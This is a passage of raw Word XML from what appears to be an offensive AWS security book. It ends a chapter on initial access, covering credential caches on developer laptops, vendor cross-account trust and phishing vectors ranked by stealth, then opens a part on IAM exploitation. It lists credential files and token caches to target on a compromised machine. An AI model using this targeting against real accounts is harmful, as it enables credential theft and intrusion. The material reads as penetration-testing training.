          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>userAgent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-sdk-go-v2/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than a browser. Anomalous-source-IP detections on Identity Center sign-in events pair well. On the user-awareness side: device-code flows should never be initiated by a user reading a message; they must always originate from the user's own CLI prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91F060" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.6  Developer workstation caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF70C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On a compromised developer laptop, several caches are worth targeting before any on-disk scan for plaintext keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55B32B"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Style w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — long-term keys (AKIA/Secret) for named profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC759A7"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Style w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/sso/cache/*.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — IAM Identity Center access tokens and refresh tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C73E20"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Style w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/cli/cache/*.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — role-session cache from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sts assume-role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>source_profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A71F07"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Style w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> backing store — macOS Keychain or secret-service on Linux. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>keychain dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or equivalent extracts the encrypted blob, which is decryptable by the unlocked user session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E1B5F"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Style w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>saml2aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>leapp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> caches — similar patterns to aws-vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CDE75"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Shell history — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.zsh_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.bash_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> frequently contain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sts assume-role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> invocations with the full arn and session name, even if not the credentials themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF0B44" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Docker desktop credential helper — stored in macOS Keychain, recoverable from an unlocked user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67600498" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.7  Third-party OAuth application compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D33B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Customers integrate third-party SaaS with AWS via cross-account roles all the time — Datadog, Wiz, Orca, CrowdStrike, Lacework, etc. Each of these integrations involves a role in the customer's AWS account with a trust policy allowing the vendor's AWS account to assume it. A compromise of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>the vendor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or of the vendor's session tokens for a specific customer) pivots straight into the customer's account. The typical trust looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED55D3A"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6A6655E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"Effect": "Allow",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB7FD2"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"Principal": { "AWS": "arn:aws:iam::464622532012:root" },   // vendor account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35639EDD"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"Action": "sts:AssumeRole",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D25CA0"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"Condition": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263845E3"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"StringEquals": { "sts:ExternalId": "customer-123-abc" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDCE2F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733BCE2B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861337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Post-2022 AWS requires that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> be validated when present, reducing the "confused deputy" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>risk; but the overall trust remains as strong as the vendor's security posture. A customer who has integrated 18 SaaS platforms via cross-account roles has 18 separate "the vendor gets popped" pivots into their account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF5E94" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.8  Initial access recap and picking the right door</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC162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Given a full set of options, an experienced operator will pick in this rough order of stealth (quietest first):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AAD76" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Leaked keys found in public source or mobile apps (attacker never touches the target's infrastructure during recon).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED52CC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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SSRF into IMDS on a public EC2-backed web app (touches the target but only through an application-layer vuln that was already there).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E282A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Device-code or IdP-consent phishing of a federated user (loud in IdP logs but quiet in AWS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA794BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Direct IdP credential phishing with evilginx-style proxy (loud in IdP logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0233CA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Brute-force / password-spray against AWS-native IAM users (loudest; GuardDuty will alert quickly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05897C0B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06685331" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Leaked AWS keys remain the most common initial-access vector and the most operationally efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4C442F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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SSRF into IMDS is still productive; IMDSv2 hardening has shrunk but not eliminated the primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0A08E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Phishing the IdP (Okta/Entra) via evilginx or device-code is the preferred vector for AWS console access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C4D91" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Mobile apps and Docker images are neglected but rich sources of AWS credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB86F51" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Vendor / third-party trust relationships are an underappreciated lateral-into-customer path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149366BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="549849640"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part Three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D96B93" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:divId w:val="536308747"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100DD77" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:divId w:val="536308747"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Identity and Access Management is the security model AWS chose. It is also the attack surface that defines AWS offensive security. Part III is the theoretical spine of this book: how AWS decides whether to allow a call, the thirty-plus primitives that turn a foothold into administrative control, and the trust relationships and resource policies that let one compromised account unlock another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CE9D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="312829624"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E374C9"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IAM Deep Dive for Attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310405C8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="1398744672"/>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025E9D6E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="1398744672"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Build an operator-grade mental model of AWS policy evaluation: the six policy types AWS consults on every call, the explicit-deny precedence, SCPs and permission boundaries, resource policies, session policies, and the condition-key grammar that makes IAM both powerful and routinely mis-written. Close with the role-trust primitives (ExternalId, SourceIdentity, confused-deputy theory) that underpin Chapter 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA46CA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>If you can recite how AWS evaluates an API call — which policies are consulted, in what order, with what precedence — you will read a misconfigured IAM statement faster than the engineer who wrote it. The flowchart is the single most important image in this book; everything else is application of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A6999" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.1  The six policy types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81D9E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On every API call AWS aggregates and evaluates up to six categories of policy. Not all apply to every call; the evaluation algorithm knows how to skip the ones that do not. But all six are potential attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F901EE8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Service Control Policies (SCPs).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attached at the Organizations root or OU level. SCPs set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>maximum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions for any principal in an affected account, including the root user. They do not grant; they only restrict. An SCP of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Deny *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the root renders every child account unusable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE9923" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Resource-based policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attached to the resource itself: S3 bucket policy, KMS key policy, Lambda resource policy, SNS/SQS access policy, Secrets Manager resource policy, ECR repository policy, Glue resource policy, API Gateway resource policy. These grant access to principals regardless of the principal's own identity policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045B69E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Identity-based policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attached to an IAM user, group, or role: managed policies (AWS-managed or customer-managed) and inline policies. These grant the principal the ability to call APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BC29B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Permission boundaries.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optional. Attached to an IAM user or role as a ceiling — the principal's effective permissions are the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>intersection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its identity policies and its permission boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5B423" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Session policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passed by the caller at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> time via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. The resulting session's permissions are the intersection of the role's identity policies and the session policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C780E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
